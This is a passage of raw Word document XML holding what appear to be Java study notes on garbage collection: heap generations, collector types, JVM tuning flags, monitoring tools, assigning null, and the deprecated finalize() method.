          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>application stability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D1A617"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duces chances of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85E362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C Works (High-Level):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CFA41C"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objects are stored in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61B0E9AA"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no references point to an object, it becomes </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eligible for GC</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327ED31D" w14:textId="717647E4" w:rsidR="002B008F"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periodically runs the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 which:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4687775D"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nds </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unreachable objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE9C236"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laims their memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBBC901" w14:textId="11253833" w:rsidR="002B008F"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cts memory (optional, depending on collector).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F8FBB8"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CE4B95" w14:paraId="39CC86DD" w14:textId="77777777" w:rsidTr="002B008F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BDD905E"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450CDD63" w14:textId="77777777" w:rsidTr="002B008F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="765E8F5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objects created (faster GC – minor GC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B008F" w:rsidRPr="00CE4B95" w14:paraId="0BE46D7B" w14:textId="77777777" w:rsidTr="002B008F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1995FC5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objects (slower GC – major GC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B008F" w:rsidRPr="00CE4B95" w14:paraId="64B4DC51" w14:textId="77777777" w:rsidTr="002B008F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5548C12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etadata (not garbage collected as objects)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0974FBA0" w14:textId="6362EDFC" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B008F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67E5E7B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5C5C26E"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C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38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DE99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B06987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eligible for GC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17134AC6"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83CFC"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int to JVM to run GC (not guaranteed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B86C15"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46AC" w14:textId="5EB9583A"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABB7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CE4B95" w14:paraId="70E58A50" w14:textId="77777777" w:rsidTr="002B008F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34DE74D6"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256C138B" w14:textId="77777777" w:rsidTr="002B008F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30F81D9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single-threaded. Good for small apps.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B008F" w:rsidRPr="00CE4B95" w14:paraId="3C15EE63" w14:textId="77777777" w:rsidTr="002B008F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E367D5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ultiple threads for minor/major GC. Good for throughput.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B008F" w:rsidRPr="00CE4B95" w14:paraId="622FBB8F" w14:textId="77777777" w:rsidTr="002B008F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30671565"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imizes pause times (deprecated).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B008F" w:rsidRPr="00CE4B95" w14:paraId="59B2D3FC" w14:textId="77777777" w:rsidTr="002B008F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C3B4C5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balance of performance and low pause times.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B008F" w:rsidRPr="00CE4B95" w14:paraId="36C14B11" w14:textId="77777777" w:rsidTr="002B008F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C7B57F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GC</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ltra-low pause times (Java 11+ / 12+).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3069AE75" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95"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2" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61568BD4"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GC Tuning (Optional for advanced users):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503F2F3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tune the JVM GC behavior using flags:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B8AD27" w14:textId="6B339F19"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s512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x2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UseG1G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p>
    <w:p w14:paraId="043E0F0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Know if GC Is Happening?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD4067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ogs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47618D8A" w14:textId="77777777"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bo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p>
    <w:p w14:paraId="34D2D9DA" w14:textId="6DFD3E28"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intGCDetails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714BD07F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9DF5DE" w14:textId="44916339"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visualvm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B15D476" w14:textId="3BB7C62F"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console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9B125A" w14:textId="77777777" w:rsidR="001D7D1B"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Viewer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3217B5F9" w14:textId="1D44486C" w:rsidR="002B008F"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Flight Recorder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEB0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0685C49E"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C is Java's way of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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D4885C"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>keep memory clean</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by removing unused objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78801CA4" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:num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Developers </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>don’t control</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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CE4B95" w:rsidRDefault="00000000" w:rsidP="002B00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E7F5E9D">
          <v:rect id="_x0000_i1293" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABEE65C" w14:textId="77777777" w:rsidR="007203D9" w:rsidRPr="00CE4B95" w:rsidRDefault="007203D9" w:rsidP="007203D9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="_Toc197867318"/>
      <w:r w:rsidRPr="00CE4B95">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CE4B95" w:rsidRDefault="00EC1F28" w:rsidP="00177E7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ssign null to an object in Java, it </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>does not immediately trigger garbage collection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Here's what happens step by step:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66232B9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ssigning null:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4CE85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ssign null to an object reference, like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177A6EA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Object obj = new MyObject();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF3F21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 = null;  // obj no longer points to the MyObject instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9ADB4E"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that obj was originally pointing to is now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mory occupied by the object is not immediately reclaimed. It's just marked as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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035F46D6"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arbage Collection (GC):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792D349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GC process</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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are no references to the object (like obj = null), the object is eventually collected during a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GC cycle</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16989F59"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after null assignment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7825CC0E"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mmediate action</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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happens later</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188DD19E"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xample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AF6302"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75F79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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA7B6EB"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F540A1"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BD4112" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28" w:rsidP="00EC1F28">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11762E8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7DE496FC"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me fields or methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4581317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5470A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Garbage Collection Trigger:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2E5C21"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request garbage collection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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5FD4184A"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signing null</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> makes the object </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eligible</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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CE4B95" w:rsidRDefault="00000000" w:rsidP="00322B4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7CD206B">
          <v:rect id="_x0000_i1294" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="42158920" w14:textId="77777777" w:rsidR="002E7005" w:rsidRPr="00CE4B95" w:rsidRDefault="002E7005" w:rsidP="002E7005">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="_Toc197867319"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>When does the finalize method get called?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
    </w:p>
    <w:p w14:paraId="0BB22C76" w14:textId="4013C8B4" w:rsidR="002E7005" w:rsidRPr="00CE4B95" w:rsidRDefault="002E7005" w:rsidP="00206B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ize() method is called </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>by the Garbage Collector (GC)</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ust before</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> an object is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>destroyed (i.e., garbage collected)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to give it a chance to clean up resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D606AC8" w14:textId="7425743D" w:rsidR="002E7005" w:rsidRPr="00CE4B95" w:rsidRDefault="002E7005" w:rsidP="002E7005">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06ED522D"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CE4B95" w14:paraId="154263CC" w14:textId="77777777" w:rsidTr="002E7005">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="597641D1"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E7005" w:rsidRPr="00CE4B95" w14:paraId="601F33DC" w14:textId="77777777" w:rsidTr="002E7005">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EFB4EF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alled </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>before the GC reclaims the object's memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E7005" w:rsidRPr="00CE4B95" w14:paraId="46D00FBB" w14:textId="77777777" w:rsidTr="002E7005">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28155C5C"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 class</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E7005" w:rsidRPr="00CE4B95" w14:paraId="1104E10B" w14:textId="77777777" w:rsidTr="002E7005">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36F8592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 void finalize() throws Throwable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E7005" w:rsidRPr="00CE4B95" w14:paraId="0D1F0925" w14:textId="77777777" w:rsidTr="002E7005">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="033A2AD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to perform </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>cleanup</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> like closing files, network sockets, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E7005" w:rsidRPr="00CE4B95" w14:paraId="2CF9B229" w14:textId="77777777" w:rsidTr="002E7005">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AAE821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it explicitly, but it's </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>not recommended</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (obj.finalize() is just a method call, not GC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E7005" w:rsidRPr="00CE4B95" w14:paraId="2B890438" w14:textId="77777777" w:rsidTr="002E7005">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0234A21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 GC calls it </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>at most once</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> per object</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E7005" w:rsidRPr="00CE4B95" w14:paraId="12B1F4D1" w14:textId="77777777" w:rsidTr="002E7005">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42739C3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xml:space="preserve">, deprecated in </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Java 9</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d in Java 18+</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> because it's </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>unreliable and unpredictable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1CC330F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Not to Use finalize()?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0739DAEF"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guarantee </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>when or even if</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
